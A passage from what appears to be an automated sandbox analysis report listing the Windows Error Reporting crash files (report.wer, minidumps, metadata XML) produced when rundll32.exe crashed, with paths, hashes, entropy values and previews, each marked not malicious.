Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.6.6.3.5.7.2.0.6.3.5.6.5.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.4.6.6.3.5.7.4.5.6.3.5.5.7.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.5.3.0.9.6.9.0.-.8.d.a.1.-.4.5.0.4.-.b.f.3.9.-.e.4.c.a.c.5.7.f.a.d.0.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.9.3.f.0.6.6.7.-.9.f.8.b.-.4.b.a.2.-.a.e.0.a.-.1.0.f.7.5.9.c.e.3.e.9.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.4.4.-.0.0.0.1.-.0.0.1.7.-.7.3.b.8.-.a.7.6.5.6.9.4.1.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_85bcb2185548acc57fb6c6745d2f8bb6b2be49b1_82810a17_1454221b\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	12680
Entropy (8bit):	3.768900346517595
Encrypted:	false
SSDEEP:	192:IUmix0oX9k3HBUZMX4jed+DgR/u7sQS274ItWcl:jmi/XOBUZMX4jed/u7sQX4ItWcl
MD5:	A12EAA04D0506870309C2F7138A98AA0
SHA1:	9114AE848AE88603BEDDF06398424E3C67DC29D1
SHA-256:	9333B076D9AF6EEBF65B397A53CB3F4BA49336735C8F231FD57A39D8A02369AA
SHA-512:	F18D88FEC310B7F7401FCF5A32931B5D64CBCCEA3200D082774B33EE49C7EB6D3CC38EF3F2C94D292DB2C4B705799A6A03C8E6918CC70C13BD2DFDC8E3C8B5AB
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.6.6.3.5.7.2.7.3.5.4.3.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.4.6.6.3.5.7.5.0.3.2.3.0.7.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.0.4.4.b.8.b.2.-.d.d.b.2.-.4.f.0.a.-.b.7.3.a.-.a.0.4.3.a.3.1.8.4.f.6.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.3.7.8.d.a.7.4.-.3.e.6.c.-.4.4.0.6.-.a.4.9.c.-.3.f.b.a.5.5.1.7.4.5.c.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.5.4.-.0.0.0.1.-.0.0.1.7.-.d.e.8.8.-.1.e.6.6.6.9.4.1.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_868973c6c77b45498eb43d99595a7fe2138962a_82810a17_1682f88f\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	12856
Entropy (8bit):	3.7590354861574173
Encrypted:	false
SSDEEP:	192:dHip0oX0FHVzOMjed+Do8/u7sBS274It7cp:dHiHXOVzOMje4/u7sBX4It7cp
MD5:	AC6564A38DA01ECB0BE197ACA75CD794
SHA1:	4F9E50FE2F686FE00F5BC846E4ECBB0A54A25B56
SHA-256:	FEFC9EC2AFAB62C5624F71587E383BC844E40ECACD6DFEAEF114ADA2F90EB0D8
SHA-512:	EE4010567180A83E2EEFDCBEB12496BB177EFF8B923195D8B556D66D3ED4039353F07020D140717CB3938DB14BB50DBA109EF1E64A0797FFCB39ACB937232421
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.4.6.6.3.4.9.4.6.5.7.4.9.7.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.b.f.2.4.f.9.-.5.5.b.0.-.4.c.8.1.-.8.c.4.1.-.f.5.0.2.7.8.0.3.4.e.1.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.f.3.e.6.0.0.0.-.4.4.3.b.-.4.1.0.1.-.9.9.4.6.-.4.9.4.1.c.7.2.0.4.2.5.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.f.c.-.0.0.0.1.-.0.0.1.7.-.2.9.8.8.-.f.a.4.7.6.9.4.1.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.u.n.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.8.6././.0.1././.3.0.:.1.1.:.4.2.:.4.4.!.1.0.3.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER10B6.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed May 5 04:46:13 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	46968
Entropy (8bit):	2.3180308197716517
Encrypted:	false
SSDEEP:	192:iLSUC4DSyUldBW8SqnEaBqAWVbvU2ZHutLribZE5nM7:Py+dI8iuqlbvPYrkUM7
MD5:	FD6A5D857A265F140C64A8EC4401E76E
SHA1:	5BA50E56C090A014951E2CCF09294481C9BBD72F
SHA-256:	35DE6FA92055213621668CADD243C03859D628519623732D27D023B32C2E0E9A
SHA-512:	408CD84742B203FD055FE55327CEC85B87E6AEA73768BFDB67CAD660F724D9CCFC44B802F0E934A05DD105979BD87563D1AD95D377BEA32103ED98EBD773BD8B
Malicious:	false
Preview:	MDMP....... ........#.`...................U...........B....... ......GenuineIntelW...........T.......0....".`.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER11CF.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed May 5 04:46:13 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	46328
Entropy (8bit):	2.2818682712438516
Encrypted:	false
SSDEEP:	192:5JTH8y+r0xjdDU6zgPCEaBqAWVbvSoDsuNRvt8rWnUa:wy+kd2nuqlbvFTRv6WB
MD5:	89E785F7C61BF264942ABCD23B3CDE58
SHA1:	950214BA1EBBA19EF1A91499F317E00FEAF1E351
SHA-256:	FDD192D0CF9CC7BFDB7F1B06256498FC87F02B6FDE3DCC8E114C6246852EF1B4
SHA-512:	6DFD762243E120D6AC71A5D0FD257AFAE44D74956F146E6443200ABA5B64C9C9341665B5BFD9C69B1E661644295498ED1A96610E09B52E58FC7A03957C9C25E0
Malicious:	false
Preview:	MDMP....... ........#.`...................U...........B....... ......GenuineIntelW...........T.......D....".`.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER13B4.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed May 5 04:46:14 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	48188
Entropy (8bit):	2.1711333233485948
Encrypted:	false
SSDEEP:	192:vYpWqB8r1dnKLnHH3AY/mGvIoEaBqAWVbvhi2QV9Jx6PnQSKcnv:pqWr7cn3AYOGQ5uqlbvhsJsQSrv
MD5:	128F18CD712C2AE70EBDC763040B46DB
SHA1:	3A74DA025DDE09F7299EF3FA65C0C1D890A0B1D4
SHA-256:	D5F9926551CEFB9ABE055F3C985AAE2666881D2FB177332BD9E452FAB62D5C30
SHA-512:	5D17EA7BDEF9F36FD447DBBD49E8C0021C950E02CA5133893A1352A739BFDCFC29D731B87144D94D8BE5FC5328E63FDF91F320574E33AFDE233CC1FE33B3BE7B
Malicious:	false
Preview:	MDMP....... ........#.`...................U...........B....... ......GenuineIntelW...........T............".`.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1440.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed May 5 04:46:14 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	39596
Entropy (8bit):	2.4898563574167345
Encrypted:	false
SSDEEP:	192:Cbvk0B1zS7UKocLM/7VrGrt/WQ9M6BMPei:Cw024OCKT99Bcei
MD5:	F61221EE7B709FA21CDE8D6C40CBAE44
SHA1:	AB4EE081228AB2899833E913571709644087B816
SHA-256:	001AA7F47984E90637B69CD29C894A971F7150EC101187527B1FAEECE198163C
SHA-512:	42274DA99FB2828138016888BF6B9DC5ADBD17E92D0023BE7E5A557C55141A8EC5A6CCCD80876BA97560199CAF6CA80918B14F46241F1F59B945783546F54C23
Malicious:	false
Preview:	MDMP....... ........#.`...................U...........B......P ......GenuineIntelW...........T.......T....".`.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER181A.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8328
Entropy (8bit):	3.7028798362459625
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi/d616YBAJ6VC1gmfTHPSXeCpru89bnTsfetm:RrlsNil616YBe6VC1gmfTHPSxn4fV
MD5:	0EF96EFA460D69819DF04855A0C83953
SHA1:	A0896DBDD1F257A071476BD98B8B4C0E69B334D7
SHA-256:	B5B3E798C971E181F0E958A884E2C736EDFD4C9558FF893DA0765B3862CCBFCC
SHA-512:	306822950855FE89F6CD7132AA20BB60A3BEB7892BB39262FD418ED75382274744526F2A5610F9A07018374370A6CD1C8817D4464C8D52F5E20B696ACB4BA90B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.1.6.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1933.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8314
Entropy (8bit):	3.6953779035389136
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNixG6qE6YBAP6VC1gmfTGGSwCpr+89bIzsfhA4m:RrlsNig6B6YBY6VC1gmfTRSPIYf8
MD5:	F75236C3A579EED761F0E10030B6E27A
SHA1:	8A1121F50A9FBA4881EA20F2899CF22872E80479
SHA-256:	0AB3BC6F3164430D89874CED4717C6472E657A13B39B80FBF2C34E1DABF5CCAC
SHA-512:	C5E7213A174DA90E324752406588C9A904F5FFF0ACB11DE815B14F38C9CE3837C933B95EC17EC0A7E50334821D86251783E7A321ABBE7C9D4AF8F53F61F603E9
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.1.8.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1982.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4679
Entropy (8bit):	4.5104481865614465
Encrypted:	false
SSDEEP:	48:cvIwSD8zstJgtWI9n/WSC8B78fm8M4JCdsrZFydN+q8/3URlv4SrSkd:uITfHUuSNqJpev7DWkd
MD5:	4ABE9138941AF30891290FAE0515DB9B
SHA1:	A83B7E57EB58CE42EC65E383DC579DA7C3ECE6CF
SHA-256:	1E4CF4BE3C12082489172157059442B2615425256D366FBD643170CABAC477D2
SHA-512:	39FF5C1DD408E065ACE7F7CEBBF5CE2671147BDEB7A05D7038B62AA8E64BAC4DBDB7E712AE65D1AC18F1C73FA965D92D45157526E0D3406D45AA652FA9EBBD3E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="975716" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A6C.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4665
Entropy (8bit):	4.475614910572437
Encrypted:	false
SSDEEP:	48:cvIwSD8zstJgtWI9n/WSC8BM8fm8M4JCdskN4xFIwb+q8/9NGnuv4SrS2d:uITfHUuSNXJ2N40mmNGSDW2d
MD5:	4846F50F872E4A8AA53D571CEECD559F
SHA1:	EC8F2D321F6EE4FEE864F21ECE27F9E8CDB1FF99
SHA-256:	8CB133E033F854D6FBE136B2D89A52FB3EEB13F71CBC659B5C83D002FBB255AC
SHA-512:	DD1E51E1A5CA7A22796A9A96EC99C0E17337F91620A6A8C0DC348D4471F4A97821824483C781AE31DA73078691CA20AE9CBD6CA73B8878B31529B7A6B3632330
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="975716" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1A8B.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8382
Entropy (8bit):	3.697021584652469
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNimi6Z6YBAT6VC1gmf8eSwCpr189bIFsfC4m:RrlsNi76Z6YBk6VC1gmf8eS6Iefc
MD5:	7EF2060332D0A5610A3207C565CC2D64
SHA1:	BD9CFDCD2D9F6752B026604A60EDCF857EB574C0
SHA-256:	06662A694D2C443D43AE0553CECF3D8781C97A5403024214A993F5EDE548D4FA
SHA-512:	FE5BC54CAE83F064681EC9403C23088F829D9438ED5675DF4226B69D497059732623F3E79C1CA858F028F1DB76CA85A4D42CC19D8E788BD5BAB2AC80F595B82D
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.7.8.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1AE9.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8314
Entropy (8bit):	3.6958368096956407
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiVMj6936YBAT6VC1gmfTGsSwCpru89bIWsfIT4m:RrlsNiC6N6YBk6VC1gmfT3SvI1fIZ
MD5:	E13F9F0460180CF911320252CE6CF9C0
SHA1:	1856F05EB0387E3A21BC61D0FF209010AFE0342C
SHA-256:	CFA8BEC43BE69FF45D5DCB11A9F35035D66D0A0C1A4A0FD7E678B6EA0B39C779
SHA-512:	7DA3B9BCA9ACAEDC29CFBBEB511301C9DC9CD9AFA7EC652CE21CF48884782C156A59CF607D52C4096A32D3EE8477E47541C8DF8003868F36B86629453BA79E7B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.0.4.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1BF3.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4770
Entropy (8bit):	4.485189072854489
Encrypted:	false
SSDEEP:	48:cvIwSD8zstJgtWI9n/WSC8BD8fm8M4JCds0MFK+q8vjs0f4SrS5d:uITfHUuSNCJyjKtfDW5d
MD5:	76F4C198B2027A56FDE3377775B02D6A
SHA1:	EB9A75DD8E34CBC8B6FF8C4335490FE33A1C813B
SHA-256:	A979FEE51D81CB7B0F8A16EF2675F414286E0BE4A7CE12C2D22EA6F2BED0D8EA
SHA-512:	F9B64331EFAD0E153309EA056E2B0435AFCDB11C24C067073DB16E1F2600788E0F0E39E291B900E9DC83DBEA0C207E6F4B310724F4D8B446493D9A5F06310EBC
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="975716" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER1C42.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4665
Entropy (8bit):	4.47479950329589
Encrypted:	false
